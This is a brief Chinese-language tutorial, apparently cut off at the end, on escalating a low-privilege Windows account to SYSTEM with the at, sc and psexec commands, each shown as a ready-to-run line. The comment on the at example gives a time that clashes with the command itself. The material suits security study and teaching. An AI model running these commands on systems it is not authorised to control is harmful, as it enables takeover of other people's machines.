0x001 at命令提权
at 命令提权的原理:at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限。
适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除
当我们拿到一个低权限的用户,通过3389端口远程连接上后,可以通过at命令来进行本地提权。
at 12:31 /interactive cmd (在19:39分生成一个交互式的System权限的cmd)
0x002 sc命令提权
命令介绍:SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。
适用版本:windows 7、8、03、08、12、16
提权命令:
# 这个命令的意思是创建一个名叫syscmd的新的交互式的cmd服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
# 然后执行
sc start syscmd # 就得到了一个system权限的cmd环境
0x003 ps命令提权
微软官方工具包:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
适用版本:Win2003 & Win2008
包含工具目录:
提权命令:
psexec.exe -accepteula -s -i -d notepad.exe
在win2008中
